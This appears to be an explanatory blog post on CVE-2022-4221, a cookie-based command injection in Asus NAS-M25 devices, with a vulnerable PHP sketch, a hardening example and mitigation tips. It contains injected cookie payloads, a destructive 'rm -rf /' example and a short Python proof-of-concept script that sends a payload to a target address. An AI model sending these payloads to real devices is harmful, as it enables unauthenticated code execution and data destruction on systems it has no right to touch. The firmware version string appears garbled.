Asus is a big name in networking, and their NAS-M25 is a convenient network-attached storage device used in homes and small offices. But what if a simple, unsanitized cookie value let an unauthenticated attacker take over your files, see passwords, or trash your device? That’s exactly what happened with CVE-2022-4221. Let’s break down this real vulnerability in simple language, see some code, and understand how attackers could exploit it.
What Is CVE-2022-4221?
The vulnerability, tracked as CVE-2022-4221, happens because the NAS-M25’s web application fails to properly “clean” cookie values before stuffing them into system shell commands. That means, if you send a web request to the NAS-M25 with a specially-crafted cookie, you might be able to make the device run ANY command—without logging in.
Affected versions: Asus NAS-M25 through firmware version 1..1.7.
How the Flaw Happens – Simple Explanation
When you visit the NAS-M25’s web interface, your browser sends cookies. For some functions, the server reads a cookie (for example, called sid) and runs shell scripts using its value—without filtering out dangerous characters.
If your sid is 123, that’s fine. But if it’s 123; rm -rf /, the system might interpret that as two commands: use 123 as usual, then run rm -rf /—which means deleting every file.
Let’s imagine an (oversimplified) code snippet from the NAS’s web interface:

```php
<?php
// PHP code handling HTTP cookies
$sid = $_COOKIE['sid']; // Get the sid cookie straight from the request

// Dangerous! The raw cookie value is interpolated into a shell command string,
// so any shell metacharacter in it (';', '|', '`', ...) is interpreted by /bin/sh
$output = shell_exec("/usr/bin/session_check $sid");
echo $output;
?>
```
No checks, no escapes—completely trusts the incoming cookie.
Suppose an attacker sends this HTTP request to the NAS box:

```http
GET /web/login.html HTTP/1.1
Host: vulnerable-nas
Cookie: sid=123;uname -a > /tmp/hacked
```

1. The server builds the shell command from the cookie value:

```sh
/usr/bin/session_check 123;uname -a > /tmp/hacked
```

2. The semicolon splits the command: the server checks session 123, then runs uname -a and writes its output to /tmp/hacked.
Now, the attacker can check /tmp/hacked (or pick another payload) to confirm code execution.
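To make the splitting above concrete, and to put the hardened form next to the vulnerable one, here is an added example (not code from the article or from Asus firmware). It tokenises the command string the way /bin/sh would, so you can see how many commands the shell would run, and contrasts that with escaping the value (the Python analogue of PHP's escapeshellarg) and with an allowlist plus argv-list call. The session_check path comes from the article's snippet; the SID_RE allowlist and the sample cookie values are assumptions constructed for the demo.

```python
import re
import shlex
from typing import List

# Path from the article's (oversimplified) PHP snippet; the binary is not assumed to exist here
SESSION_CHECK = "/usr/bin/session_check"

# Constructed sample cookie values: a normal session id and the article's injection payload
GOOD_SID = "123"
EVIL_SID = "123;uname -a > /tmp/hacked"

# Hypothetical allowlist for a session id: letters and digits only, bounded length
SID_RE = re.compile(r"[A-Za-z0-9]{1,64}")


def vulnerable_command(sid: str) -> str:
    """Mirror of the article's PHP: the raw cookie is interpolated into a shell string."""
    return f"{SESSION_CHECK} {sid}"


def escaped_command(sid: str) -> str:
    """Analogue of escapeshellarg(): the whole cookie value becomes one quoted argument."""
    return f"{SESSION_CHECK} {shlex.quote(sid)}"


def shell_commands(cmd: str) -> List[List[str]]:
    """Tokenise a command string like /bin/sh and split it at ';' into the separate
    commands the shell would execute. Pure tokeniser: nothing is run."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def validate_sid(sid: str) -> str:
    """Allowlist check: anything outside [A-Za-z0-9]{1,64} is rejected outright."""
    if not SID_RE.fullmatch(sid):
        raise ValueError("invalid session id")
    return sid


def safe_argv(sid: str) -> List[str]:
    """Hardened form: validated value as its own argv element, never via a shell string.
    Execute with subprocess.run(safe_argv(sid), ...) and no shell=True."""
    return [SESSION_CHECK, validate_sid(sid)]
```

Escaping alone keeps the payload inside a single argument; the allowlist plus argv list removes the shell from the picture entirely, which is the fix to prefer.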
Here’s a basic script to test if a NAS box is vulnerable (for security research!):

```python
import requests

TARGET = "http://192.168.1.100"  # address of the NAS under test

# The payload rides in the sid cookie; the ';' terminates session_check's arguments
cookies = {"sid": "123;id>/tmp/poc4221"}
r = requests.get(f"{TARGET}/index.php", cookies=cookies)
print(r.status_code)
print("Check /tmp/poc4221 on the NAS for output.")
```
If the file /tmp/poc4221 appears on the target, the bug is live!
Attackers could:

- Read files (e.g., /etc/shadow for password hashes).
- Destroy or encrypt your data (ransomware).

All without any valid login—just a single web hit.
References and Original Disclosures
- NIST's CVE Record for CVE-2022-4221
- VulDB Entry with More Technical Details
(Keep an eye on vendor advisories as well: Asus Security Advisories.)

- Never expose NAS devices directly to the Internet unless necessary.
- Segment your network—put sensitive devices on their own VLANs or restrict access using firewalls.
Quick Summary
CVE-2022-4221 is a severe command injection vulnerability in Asus NAS-M25 (up to version 1..1.7), allowing attackers to run OS commands using unsanitized cookies—no password needed. This real-world flaw is a reminder for everyone: always sanitize inputs, especially when using them in system calls. If you use or manage an Asus NAS-M25, update now and check your network exposure.
*Stay safe out there—vulnerabilities like this are a reminder that even simple cookies can crumble your defenses if left unchecked.*
Timeline
Published on: 12/01/2022 10:15:00 UTC
Last modified on: 12/05/2022 15:11:00 UTC